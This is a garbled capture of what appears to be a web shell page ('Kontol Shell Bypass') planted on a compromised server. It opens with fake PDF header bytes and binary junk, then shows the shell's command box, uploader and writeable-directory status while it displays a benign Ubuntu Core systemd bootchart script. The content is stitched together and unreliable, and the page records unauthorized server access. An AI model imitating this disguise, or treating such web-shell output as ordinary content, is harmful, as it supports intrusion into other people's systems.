%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /snap/core22/current/lib/systemd/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //snap/core22/current/lib/systemd/systemd-bootchart-poststop.sh
#!/bin/sh

set -eu

modeenv=/run/mnt/data/system-data/var/lib/snapd/modeenv
mode="$(/usr/libexec/core/get-mode mode "${modeenv}")" || mode="unknown"

case "${mode}" in
    install|recover|factory-reset)
        save_dir=/run/mnt/ubuntu-data/system-data/var/log/debug
        ;;
    *)
        save_dir=/run/mnt/data/system-data/var/log/debug
        ;;
esac

next_num=1
for boot in "${save_dir}"/boot*; do
    if [ -d "${boot}" ]; then
        base="$(basename "${boot}")"
        num="${base#boot}"
        if [ "${num}" -ge "${next_num}" ]; then
            next_num="$((${num}+1))"
        fi
    fi
done
next_dir="${save_dir}/boot${next_num}"
mkdir -p "${next_dir}"
mv /run/log/base/*.svg "${next_dir}/"

for initrd_file in /run/log/*.svg; do
    if [ -f "${initrd_file}" ]; then
        base="$(basename "${initrd_file}")"
        mv "${initrd_file}" "${next_dir}/initrd-${base}"
    fi
done

Kontol Shell Bypass